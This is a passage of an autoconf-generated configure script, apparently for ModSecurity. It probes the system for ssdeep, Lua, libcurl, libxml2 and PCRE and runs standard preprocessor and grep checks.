SSDEEP_FOUND=2 fi else as_fn_error $? "SSDEEP was explicitly referenced but it was not found" "$LINENO" 5 SSDEEP_FOUND=-1 fi else SSDEEP_FOUND=1 { $as_echo "$as_me:${as_lineno-$LINENO}: using SSDEEP v${SSDEEP_VERSION}" >&5 $as_echo "$as_me: using SSDEEP v${SSDEEP_VERSION}" >&6;} SSDEEP_CFLAGS="-DWITH_SSDEEP ${SSDEEP_CFLAGS}" SSDEEP_DISPLAY="${SSDEEP_LDADD} ${SSDEEP_LDFLAGS}, ${SSDEEP_CFLAGS}" fi if test "SSDEEP_CFLAGS" != ""; then SSDEEP_CFLAGS_TRUE= SSDEEP_CFLAGS_FALSE='#' else SSDEEP_CFLAGS_TRUE='#' SSDEEP_CFLAGS_FALSE= fi # Check for LUA # Possible names for the lua library/package (pkg-config) LUA_POSSIBLE_LIB_NAMES="luajit luajit-5.1 lua53 lua5.3 lua-5.3 lua52 lua5.2 lua-5.2 lua51 lua5.1 lua-5.1 lua" # Possible extensions for the library LUA_POSSIBLE_EXTENSIONS="so so0 la sl dll dylib so.0.0.0" # Possible paths (if pkg-config was not found, proceed with the file lookup) LUA_POSSIBLE_PATHS="/usr/lib /usr/local/lib /usr/local/lib64 /usr/local/lua /usr/local/liblua /usr/local /opt /usr /usr/lib64 /opt/local" # Variables to be set by this very own script. LUA_CFLAGS="" LUA_LDFLAGS="" LUA_LDADD="" LUA_DISPLAY="" # Check whether --with-lua was given. if test "${with_lua+set}" = set; then : withval=$with_lua; fi if test "x${with_lua}" == "xno"; then $as_echo "#define HAVE_LUA 0" >>confdefs.h { $as_echo "$as_me:${as_lineno-$LINENO}: Support for LUA was disabled by the utilization of --without-lua or --with-lua=no" >&5 $as_echo "$as_me: Support for LUA was disabled by the utilization of --without-lua or --with-lua=no" >&6;} LUA_DISABLED=yes else if test "x${with_lua}" == "xyes"; then LUA_MANDATORY=yes { $as_echo "$as_me:${as_lineno-$LINENO}: LUA support was marked as mandatory by the utilization of --with-lua=yes" >&5 $as_echo "$as_me: LUA support was marked as mandatory by the utilization of --with-lua=yes" >&6;} else LUA_MANDATORY=no fi for x in ${LUA_POSSIBLE_PATHS}; do path=${x} echo "*** LOOKING AT PATH: " ${path} for y in ${LUA_POSSIBLE_EXTENSIONS}; do for z in ${LUA_POSSIBLE_LIB_NAMES}; do if test -e "${path}/${z}.${y}"; then lua_lib_path="${path}/" lua_lib_name="${z}" lua_lib_file="${lua_lib_path}/${z}.${y}" break fi if test -e "${path}/lib${z}.${y}"; then lua_lib_path="${path}/" lua_lib_name="${z}" lua_lib_file="${lua_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/lib${z}.${y}"; then lua_lib_path="${path}/lib/" lua_lib_name="${z}" lua_lib_file="${lua_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/x86_64-linux-gnu/lib${z}.${y}"; then lua_lib_path="${path}/lib/x86_64-linux-gnu/" lua_lib_name="${z}" lua_lib_file="${lua_lib_path}/lib${z}.${y}" break fi if test -e "${path}/lib/i386-linux-gnu/lib${z}.${y}"; then lua_lib_path="${path}/lib/i386-linux-gnu/" lua_lib_name="${z}" lua_lib_file="${lua_lib_path}/lib${z}.${y}" break fi done if test -n "$lua_lib_path"; then break fi done if test -e "${path}/include/lua.h"; then lua_inc_path="${path}/include" elif test -e "${path}/lua.h"; then lua_inc_path="${path}" elif test -e "${path}/include/lua/lua.h"; then lua_inc_path="${path}/include/lua" elif test -e "${path}/include/lua5.3/lua.h"; then lua_inc_path="${path}/include/lua5.3" LUA_VERSION=503 elif test -e "${path}/include/lua5.2/lua.h"; then lua_inc_path="${path}/include/lua5.2" LUA_VERSION=502 elif test -e "${path}/include/lua5.1/lua.h"; then lua_inc_path="${path}/include/lua5.1" LUA_VERSION=501 elif test -e "${path}/include/luajit-2.0/lua.h"; then lua_inc_path="${path}/include/luajit-2.0" LUA_VERSION=501 fi if test -n "${lua_lib_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: LUA library found at: ${lua_lib_file}" >&5 $as_echo "$as_me: LUA library found at: ${lua_lib_file}" >&6;} fi if test -n "${lua_inc_path}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: LUA headers found at: ${lua_inc_path}" >&5 $as_echo "$as_me: LUA headers found at: ${lua_inc_path}" >&6;} fi if test -n "${lua_lib_path}" -a -n "${lua_inc_path}"; then LUA_CFLAGS="-I${lua_inc_path}" LUA_LDADD="-l${lua_lib_name}" LUA_LDFLAGS="-L${lua_lib_path}" LUA_DISPLAY="${lua_lib_file}, ${lua_inc_path}" # Double checking version from lua.h... cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include > int main () { #if (LUA_VERSION_NUM < 502) return 0; #else #error Lua 5.1 not detected #endif ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO"; then : LUA_VERSION=501 else lua_5_1=0 fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include int main () { #if (LUA_VERSION_NUM == 502) return 0; #else #error Lua 5.2 not detected #endif ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO"; then : LUA_VERSION=502 else lua_5_2=0 fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext if test -z "${LUA_VERSION}" ; then # As a last resort, try to find LUA version from $lua_inc_path while read -r line do case "$line" in (\#define\ LUA_VERSION_NUM*501*) LUA_VERSION=501 ;; (\#define\ LUA_VERSION_NUM*502*) LUA_VERSION=501 ;; (\#define\ LUA_VERSION_NUM*503*) LUA_VERSION=503 esac done <"${lua_inc_path}/lua.h" { $as_echo "$as_me:${as_lineno-$LINENO}: LUA_VERSION is ${LUA_VERSION} found at: ${lua_inc_path}" >&5 $as_echo "$as_me: LUA_VERSION is ${LUA_VERSION} found at: ${lua_inc_path}" >&6;} else { $as_echo "$as_me:${as_lineno-$LINENO}: LUA version from includes: ${LUA_VERSION}" >&5 $as_echo "$as_me: LUA version from includes: ${LUA_VERSION}" >&6;} fi case $LUA_VERSION in (501) LUA_CFLAGS="-DWITH_LUA_5_1 ${LUA_CFLAGS}" ; lua_5_1=1 ;; (502) LUA_CFLAGS="-DWITH_LUA_5_2 ${LUA_CFLAGS}" ; lua_5_2=1 ;; esac fi if test -n "${LUA_CFLAGS}"; then break fi done if test -z "${LUA_CFLAGS}"; then #Trying to figure out the version using pkg-config... if test -n "${PKG_CONFIG}"; then LUA_PKG_NAME="" for x in ${LUA_POSSIBLE_LIB_NAMES}; do if ${PKG_CONFIG} --exists ${x}; then LUA_PKG_NAME="$x" LUA_PKG_VERSION="`${PKG_CONFIG} ${LUA_PKG_NAME} --modversion`" break fi done fi if test -n "${LUA_PKG_NAME}"; then # Package was found using the pkg-config scripts LUA_PKG_VERSION="`${PKG_CONFIG} ${LUA_PKG_NAME} --modversion`" LUA_CFLAGS="`${PKG_CONFIG} ${LUA_PKG_NAME} --cflags`" LUA_LDADD="`${PKG_CONFIG} ${LUA_PKG_NAME} --libs-only-l`" LUA_LDFLAGS="`${PKG_CONFIG} ${LUA_PKG_NAME} --libs-only-L --libs-only-other`" LUA_DISPLAY="${LUA_LDADD}, ${LUA_CFLAGS}" case $LUA_PKG_VERSION in (5.1*) LUA_CFLAGS="-DWITH_LUA_5_1 ${LUA_CFLAGS}" ; lua_5_1=1 ;; (5.2*) LUA_CFLAGS="-DWITH_LUA_5_2 ${LUA_CFLAGS}" ; lua_5_2=1 ;; (2.0*) LUA_CFLAGS="-DWITH_LUA_5_1 ${LUA_CFLAGS}" ; lua_5_1=1 ;; (2.1*) LUA_CFLAGS="-DWITH_LUA_5_1 -DWITH_LUA_JIT_2_1 ${LUA_CFLAGS}" ; lua_5_1=1 ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: LUA pkg-config version: ${LUA_PKG_VERSION}" >&5 $as_echo "$as_me: LUA pkg-config version: ${LUA_PKG_VERSION}" >&6;} fi fi fi if test -z "${LUA_CFLAGS}"; then if test -z "${LUA_MANDATORY}" || test "x${LUA_MANDATORY}" == "xno"; then if test -z "${LUA_DISABLED}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: LUA library was not found" >&5 $as_echo "$as_me: LUA library was not found" >&6;} LUA_FOUND=0 else LUA_FOUND=2 fi else as_fn_error $? "LUA was explicitly referenced but it was not found" "$LINENO" 5 LUA_FOUND=-1 fi else if test -z "${LUA_MANDATORY}" || test "x${LUA_MANDATORY}" == "xno"; then LUA_FOUND=1 { $as_echo "$as_me:${as_lineno-$LINENO}: using LUA ${LUA_LDADD}" >&5 $as_echo "$as_me: using LUA ${LUA_LDADD}" >&6;} LUA_CFLAGS="-DWITH_LUA ${LUA_CFLAGS}" LUA_DISPLAY="${LUA_LDADD} ${LUA_LDFLAGS}, ${LUA_CFLAGS}" else LUA_FOUND=1 { $as_echo "$as_me:${as_lineno-$LINENO}: using LUA ${LUA_LDADD}" >&5 $as_echo "$as_me: using LUA ${LUA_LDADD}" >&6;} LUA_CFLAGS="-DWITH_LUA ${LUA_CFLAGS}" LUA_DISPLAY="${LUA_LDADD} ${LUA_LDFLAGS}, ${LUA_CFLAGS}" fi fi if test "LUA_CFLAGS" != ""; then LUA_CFLAGS_TRUE= LUA_CFLAGS_FALSE='#' else LUA_CFLAGS_TRUE='#' LUA_CFLAGS_FALSE= fi # # Check for curl # # Check whether --with-curl was given. if test "${with_curl+set}" = set; then : withval=$with_curl; test_paths="${with_curl}" else test_paths="/usr/local/libcurl /usr/local/curl /usr/local /opt/libcurl /opt/curl /opt /usr" fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking for libcurl config script" >&5 $as_echo_n "checking for libcurl config script... " >&6; } for x in ${test_paths}; do if test ! -d "$x" -a -e "$x"; then CURL_CONFIG=$x curl_path="no" break fi for CURL_CONFIG in curl-config; do if test -e "${x}/bin/${CURL_CONFIG}"; then curl_path="${x}/bin" break elif test -e "${x}/${CURL_CONFIG}"; then curl_path="${x}" break else curl_path="" fi done if test -n "$curl_path"; then break fi done if test -n "${curl_path}"; then if test "${curl_path}" != "no"; then CURL_CONFIG="${curl_path}/${CURL_CONFIG}" fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: ${CURL_CONFIG}" >&5 $as_echo "${CURL_CONFIG}" >&6; } CURL_VERSION=`${CURL_CONFIG} --version | sed 's/^[^0-9][^[:space:]][^[:space:]]*[[:space:]]*//' | tr '\r\n' ' '` if test ! -z "${CURL_VERSION}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: curl VERSION: $CURL_VERSION" >&5 $as_echo "$as_me: curl VERSION: $CURL_VERSION" >&6;}; fi CURL_CFLAGS="`${CURL_CONFIG} --cflags`" if test ! -z "${CURL_CFLAGS}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: curl CFLAGS: $CURL_CFLAGS" >&5 $as_echo "$as_me: curl CFLAGS: $CURL_CFLAGS" >&6;}; fi CURL_LDADD="`${CURL_CONFIG} --libs`" if test ! -z "${CURL_CONFIG}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: curl LDADD: $CURL_LIBS" >&5 $as_echo "$as_me: curl LDADD: $CURL_LIBS" >&6;}; fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking if libcurl is at least v${CURL_MIN_VERSION}" >&5 $as_echo_n "checking if libcurl is at least v${CURL_MIN_VERSION}... " >&6; } curl_min_ver=`echo ${CURL_MIN_VERSION} | awk -F. '{print (\$ 1 * 1000000) + (\$ 2 * 1000) + \$ 3}'` curl_ver=`echo ${CURL_VERSION} | awk -F. '{print (\$ 1 * 1000000) + (\$ 2 * 1000) + \$ 3}'` if test "$curl_min_ver" -le "$curl_ver"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes, $CURL_VERSION" >&5 $as_echo "yes, $CURL_VERSION" >&6; } curl_tlsv2_ver=`echo 7.34.0 | awk -F. '{print (\$ 1 * 1000000) + (\$ 2 * 1000) + \$ 3}'` if test "$curl_tlsv2_ver" -le "$curl_ver"; then CURL_CFLAGS="${CURL_CFLAGS} -DWITH_CURL_SSLVERSION_TLSv1_2" fi CURL_CFLAGS="${CURL_CFLAGS} -DWITH_CURL" else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no, $CURL_VERSION" >&5 $as_echo "no, $CURL_VERSION" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: NOTE: curl library may be too old" >&5 $as_echo "$as_me: NOTE: curl library may be too old" >&6;} fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking if libcurl is linked with gnutls" >&5 $as_echo_n "checking if libcurl is linked with gnutls... " >&6; } curl_uses_gnutls=`echo ${CURL_LIBS} | grep gnutls | wc -l` if test "$curl_uses_gnutls" -ne 0; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: NOTE: curl linked with gnutls may be buggy, openssl recommended" >&5 $as_echo "$as_me: NOTE: curl linked with gnutls may be buggy, openssl recommended" >&6;} CURL_USES_GNUTLS=yes else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } CURL_USES_GNUTLS=no fi else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x${with_curl}" == "xno"; then CURL_DISABLED=yes else if test "x${with_curl}" != "x"; then CURL_MANDATORY=yes fi fi if test -z "${CURL_VERSION}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: *** curl library not found." >&5 $as_echo "$as_me: *** curl library not found." >&6;} if test -z "${CURL_MANDATORY}"; then if test -z "${CURL_DISABLED}"; then CURL_FOUND=0 else CURL_FOUND=2 fi else as_fn_error $? "Curl was explicitly referenced but it was not found" "$LINENO" 5 CURL_FOUND=-1 fi else CURL_FOUND=1 { $as_echo "$as_me:${as_lineno-$LINENO}: using curl v${CURL_VERSION}" >&5 $as_echo "$as_me: using curl v${CURL_VERSION}" >&6;} CURL_DISPLAY="${CURL_LDADD}, ${CURL_CFLAGS}" fi if ! test -z "${CURL_VERSION}"; then $as_echo "#define MSC_WITH_CURL 1" >>confdefs.h fi # # Check for LibXML # # Check whether --with-libxml was given. if test "${with_libxml+set}" = set; then : withval=$with_libxml; test_paths="${with_libxml}" else test_paths="/usr/local/libxml2 /usr/local/xml2 /usr/local/xml /usr/local /opt/libxml2 /opt/libxml /opt/xml2 /opt/xml /opt /usr" fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking for libxml2 config script" >&5 $as_echo_n "checking for libxml2 config script... " >&6; } for x in ${test_paths}; do if test ! -d "$x" -a -e "$x"; then LIBXML2_CONFIG=$x libxml2_path="no" break fi for LIBXML2_CONFIG in xml2-config xml-2-config xml-config; do if test -e "${x}/bin/${LIBXML2_CONFIG}"; then libxml2_path="${x}/bin" break elif test -e "${x}/${LIBXML2_CONFIG}"; then libxml2_path="${x}" break else libxml2_path="" fi done if test -n "$libxml2_path"; then break fi done if test -n "${libxml2_path}"; then if test "${libxml2_path}" != "no"; then LIBXML2_CONFIG="${libxml2_path}/${LIBXML2_CONFIG}" fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: ${LIBXML2_CONFIG}" >&5 $as_echo "${LIBXML2_CONFIG}" >&6; } LIBXML2_VERSION=`${LIBXML2_CONFIG} --version | sed 's/^[^0-9][^[:space:]][^[:space:]]*[[:space:]]*//'` if test ! -z "${LIBXML2_VERSION}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: xml VERSION: $LIBXML2_VERSION" >&5 $as_echo "$as_me: xml VERSION: $LIBXML2_VERSION" >&6;}; fi LIBXML2_CFLAGS="`${LIBXML2_CONFIG} --cflags` -DWITH_LIBXML2" if test ! -z "${LIBXML2_CFLAGS}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: xml CFLAGS: $LIBXML2_CFLAGS" >&5 $as_echo "$as_me: xml CFLAGS: $LIBXML2_CFLAGS" >&6;}; fi LIBXML2_LDADD="`${LIBXML2_CONFIG} --libs`" if test ! -z "${LIBXML2_LDADD}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: xml LDADD: $LIBXML2_LDADD" >&5 $as_echo "$as_me: xml LDADD: $LIBXML2_LDADD" >&6;}; fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking if libxml2 is at least v2.6.29" >&5 $as_echo_n "checking if libxml2 is at least v2.6.29... " >&6; } libxml2_min_ver=`echo 2.6.29 | awk -F. '{print (\$ 1 * 1000000) + (\$ 2 * 1000) + \$ 3}'` libxml2_ver=`echo ${LIBXML2_VERSION} | awk -F. '{print (\$ 1 * 1000000) + (\$ 2 * 1000) + \$ 3}'` if test "$libxml2_ver" -ge "$libxml2_min_ver"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes, $LIBXML2_VERSION" >&5 $as_echo "yes, $LIBXML2_VERSION" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no, $LIBXML2_VERSION" >&5 $as_echo "no, $LIBXML2_VERSION" >&6; } as_fn_error $? "NOTE: libxml2 library must be at least 2.6.29" "$LINENO" 5 fi else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x${with_libxml}" == "xno"; then LIBXML2_DISABLED=yes else if test "x${with_libxml}" != "x"; then LIBXML2_MANDATORY=yes fi fi if test -z "${LIBXML2_VERSION}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: *** libxml2 library not found." >&5 $as_echo "$as_me: *** libxml2 library not found." >&6;} if test -z "${LIBXML2_MANDATORY}"; then if test -z "${LIBXML2_DISABLED}"; then LIBXML2_FOUND=0 else LIBXML2_FOUND=2 fi else as_fn_error $? "Libxml2 was explicitly referenced but it was not found" "$LINENO" 5 LIBXML2_FOUND=-1 fi else LIBXML2_FOUND=1 { $as_echo "$as_me:${as_lineno-$LINENO}: using libxml2 v${LIBXML2_VERSION}" >&5 $as_echo "$as_me: using libxml2 v${LIBXML2_VERSION}" >&6;} LIBXML2_DISPLAY="${LIBXML2_LDADD}, ${LIBXML2_CFLAGS}" fi # # Check for libpcre # # Check whether --with-pcre was given. if test "${with_pcre+set}" = set; then : withval=$with_pcre; test_paths="${with_pcre}" else test_paths="/usr/local/libpcre /usr/local/pcre /usr/local /opt/libpcre /opt/pcre /opt /usr /opt/local" fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking for libpcre config script" >&5 $as_echo_n "checking for libpcre config script... " >&6; } for x in ${test_paths}; do if test ! -d "$x" -a -e "$x"; then PCRE_CONFIG=$x pcre_path="no" break fi for PCRE_CONFIG in pcre-config; do if test -e "${x}/bin/${PCRE_CONFIG}"; then pcre_path="${x}/bin" break elif test -e "${x}/${PCRE_CONFIG}"; then pcre_path="${x}" break else pcre_path="" fi done if test -n "$pcre_path"; then break fi done if test -n "${pcre_path}"; then if test "${pcre_path}" != "no"; then PCRE_CONFIG="${pcre_path}/${PCRE_CONFIG}" fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: ${PCRE_CONFIG}" >&5 $as_echo "${PCRE_CONFIG}" >&6; } PCRE_VERSION="`${PCRE_CONFIG} --version`" if test ! -z "${PCRE_VERSION}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: pcre VERSION: $PCRE_VERSION" >&5 $as_echo "$as_me: pcre VERSION: $PCRE_VERSION" >&6;}; fi PCRE_CFLAGS="`${PCRE_CONFIG} --cflags`" if test ! -z "${PCRE_CFLAGS}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: pcre CFLAGS: $PCRE_CFLAGS" >&5 $as_echo "$as_me: pcre CFLAGS: $PCRE_CFLAGS" >&6;}; fi PCRE_LDADD="`${PCRE_CONFIG} --libs`" if test ! -z "${PCRE_LDADD}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: pcre LDADD: $PCRE_LDADD" >&5 $as_echo "$as_me: pcre LDADD: $PCRE_LDADD" >&6;}; fi PCRE_LD_PATH="/`${PCRE_CONFIG} --libs | cut -d'/' -f2,3,4,5,6 | cut -d ' ' -f1`" if test ! -z "${PCRE_LD_PATH}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: pcre PCRE_LD_PATH: $PCRE_LD_PATH" >&5 $as_echo "$as_me: pcre PCRE_LD_PATH: $PCRE_LD_PATH" >&6;}; fi else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test -n "${PCRE_VERSION}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: checking for PCRE JIT" >&5 $as_echo_n "checking for PCRE JIT... " >&6; } save_CFLAGS=$CFLAGS save_LDFLAGS=$LDFLAGS CFLAGS="${PCRE_CFLAGS} ${CFLAGS}" LDFLAGS="${LDFLAGS} ${PCRE_LDADD}" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include #include int main () { int jit = 0; pcre_free_study(NULL); pcre_config(PCRE_CONFIG_JIT, &jit); if (jit != 1) return 1; ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO"; then : pcre_jit_available=yes else : fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext if test "x$pcre_jit_available" = "xyes"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } PCRE_CFLAGS="${PCRE_CFLAGS} -DPCRE_HAVE_JIT" else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi CFLAGS=$save_CFLAGS LDFLAGS=$save_$LDFLAGS fi if test -z "${PCRE_VERSION}"; then { $as_echo "$as_me:${as_lineno-$LINENO}: *** pcre library not found." >&5 $as_echo "$as_me: *** pcre library not found." >&6;} as_fn_error $? "pcre library is required" "$LINENO" 5 else { $as_echo "$as_me:${as_lineno-$LINENO}: using pcre v${PCRE_VERSION}" >&5 $as_echo "$as_me: using pcre v${PCRE_VERSION}" >&6;} PCRE_LDADD="${PCRE_LDADD} -lpcre" fi # Checks for header files. ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu { $as_echo "$as_me:${as_lineno-$LINENO}: checking how to run the C preprocessor" >&5 $as_echo_n "checking how to run the C preprocessor... " >&6; } # On Suns, sometimes $CPP names a directory. if test -n "$CPP" && test -d "$CPP"; then CPP= fi if test -z "$CPP"; then if ${ac_cv_prog_CPP+:} false; then : $as_echo_n "(cached) " >&6 else # Double quotes because CPP needs to be expanded for CPP in "$CC -E" "$CC -E -traditional-cpp" "/lib/cpp" do ac_preproc_ok=false for ac_c_preproc_warn_flag in '' yes do # Use a header file that comes with gcc, so configuring glibc # with a fresh cross-compiler works. # Prefer to if __STDC__ is defined, since # exists even on freestanding compilers. # On the NeXT, cc -E runs the code through the compiler's parser, # not just through cpp. "Syntax error" is here to catch this case. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #ifdef __STDC__ # include #else # include #endif Syntax error _ACEOF if ac_fn_c_try_cpp "$LINENO"; then : else # Broken: fails on valid input. continue fi rm -f conftest.err conftest.i conftest.$ac_ext # OK, works on sane cases. Now check whether nonexistent headers # can be detected and how. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if ac_fn_c_try_cpp "$LINENO"; then : # Broken: success on invalid input. continue else # Passes both tests. ac_preproc_ok=: break fi rm -f conftest.err conftest.i conftest.$ac_ext done # Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. rm -f conftest.i conftest.err conftest.$ac_ext if $ac_preproc_ok; then : break fi done ac_cv_prog_CPP=$CPP fi CPP=$ac_cv_prog_CPP else ac_cv_prog_CPP=$CPP fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CPP" >&5 $as_echo "$CPP" >&6; } ac_preproc_ok=false for ac_c_preproc_warn_flag in '' yes do # Use a header file that comes with gcc, so configuring glibc # with a fresh cross-compiler works. # Prefer to if __STDC__ is defined, since # exists even on freestanding compilers. # On the NeXT, cc -E runs the code through the compiler's parser, # not just through cpp. "Syntax error" is here to catch this case. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #ifdef __STDC__ # include #else # include #endif Syntax error _ACEOF if ac_fn_c_try_cpp "$LINENO"; then : else # Broken: fails on valid input. continue fi rm -f conftest.err conftest.i conftest.$ac_ext # OK, works on sane cases. Now check whether nonexistent headers # can be detected and how. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if ac_fn_c_try_cpp "$LINENO"; then : # Broken: success on invalid input. continue else # Passes both tests. ac_preproc_ok=: break fi rm -f conftest.err conftest.i conftest.$ac_ext done # Because of `break', _AC_PREPROC_IFELSE's cleaning code was skipped. rm -f conftest.i conftest.err conftest.$ac_ext if $ac_preproc_ok; then : else { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 $as_echo "$as_me: error: in \`$ac_pwd':" >&2;} as_fn_error $? "C preprocessor \"$CPP\" fails sanity check See \`config.log' for more details" "$LINENO" 5; } fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu { $as_echo "$as_me:${as_lineno-$LINENO}: checking for grep that handles long lines and -e" >&5 $as_echo_n "checking for grep that handles long lines and -e... " >&6; } if ${ac_cv_path_GREP+:} false; then : $as_echo_n "(cached) " >&6 else if test -z "$GREP"; then ac_path_GREP_found=false # Loop through the user's path and test for each of PROGNAME-LIST as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_prog in grep ggrep; do for ac_exec_ext in '' $ac_executable_extensions; do ac_path_GREP="$as_dir/$ac_prog$ac_exec_ext" as_fn_executable_p "$ac_path_GREP" || continue # Check for GNU ac_path_GREP and select it if it is found. # Check for GNU $ac_path_GREP case `"$ac_path_GREP" --version 2>&1` in *GNU*) ac_cv_path_GREP="$ac_path_GREP" ac_path_GREP_found=:;; *) ac_count=0 $as_echo_n 0123456789 >"conftest.in" while : do cat "conftest.in" "conftest.in" >"conftest.tmp" mv "conftest.tmp" "conftest.in" cp "conftest.in" "conftest.nl" $as_echo 'GREP' >> "conftest.nl" "$ac_path_GREP" -e 'GREP$' -e '-(cannot match)-' < "conftest.nl" >"conftest.out" 2>/dev/null || break diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break as_fn_arith $ac_count + 1 && ac_count=$as_val if test $ac_count -gt ${ac_path_GREP_max-0}; then # Best one so far, save it but keep looking for a better one ac_cv_path_GREP="$ac_path_GREP" ac_path_GREP_max=$ac_count fi # 10*(2^10) chars as input seems more than enough test $ac_count -gt 10 && break done rm -f conftest.in conftest.tmp conftest.nl conftest.out;; esac $ac_path_GREP_found && break 3 done done done IFS=$as_save_IFS if test -z "$ac_cv_path_GREP"; then as_fn_error $? "no acceptable grep could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" "$LINENO" 5 fi else ac_cv_path_GREP=$GREP fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_GREP" >&5 $as_echo "$ac_cv_path_GREP" >&6; } GREP="$ac_cv_path_GREP" { $as_echo "$as_me:${as_lineno-$LINENO}: checking for egrep" >&5 $as_echo_n "checking for egrep... " >&6; } if ${ac_cv_path_EGREP+:} false; then : $as_echo_n "(cached) " >&6 else if echo a | $GREP -E '(a|b)' >/dev/null 2>&1 then ac_cv_path_EGREP="$GREP -E" else if test -z "$EGREP"; then ac_path_EGREP_found=false # Loop through the user's path and test for each of PROGNAME-LIST as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_prog in egrep; do for ac_exec_ext in '' $ac_executable_extensions; do ac_path_EGREP="$as_dir/$ac_prog$ac_exec_ext" as_fn_executable_p "$ac_path_EGREP" || continue # Check for GNU ac_path_EGREP and select it if it is found. # Check for GNU $ac_path_EGREP case `"$ac_path_EGREP" --version 2>&1` in *GNU*) ac_cv_path_EGREP="$ac_path_EGREP" ac_path_EGREP_found=:;; *) ac_count=0 $as_echo_n 0123456789 >"conftest.in" while : do cat "conftest.in" "conftest.in" >"conftest.tmp" mv "conftest.tmp" "conftest.in" cp "conftest.in" "conftest.nl" $as_echo 'EGREP' >> "conftest.nl" "$ac_path_EGREP" 'EGREP$' < "conftest.nl" >"conftest.out" 2>/dev/null || break diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break as_fn_arith $ac_count + 1 && ac_count=$as_val if test $ac_count -gt ${ac_path_EGREP_max-0}; then # Best one so far, save it but keep looking for a better one ac_cv_path_EGREP="$ac_path_EGREP" ac_path_EGREP_max=$ac_count fi # 10*(2^10) chars as input seems more than enough test $ac_count -gt 10 && break done rm -f conftest.in conftest.tmp conftest.nl conftest.out;; esac $ac_path_EGREP_found && break 3 done done done IFS=$as_save_IFS if test -z "$ac_cv_path_EGREP"; then as_fn_error $? "no acceptable egrep could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" "$LINENO" 5 fi else ac_cv_path_EGREP=$EGREP fi fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: 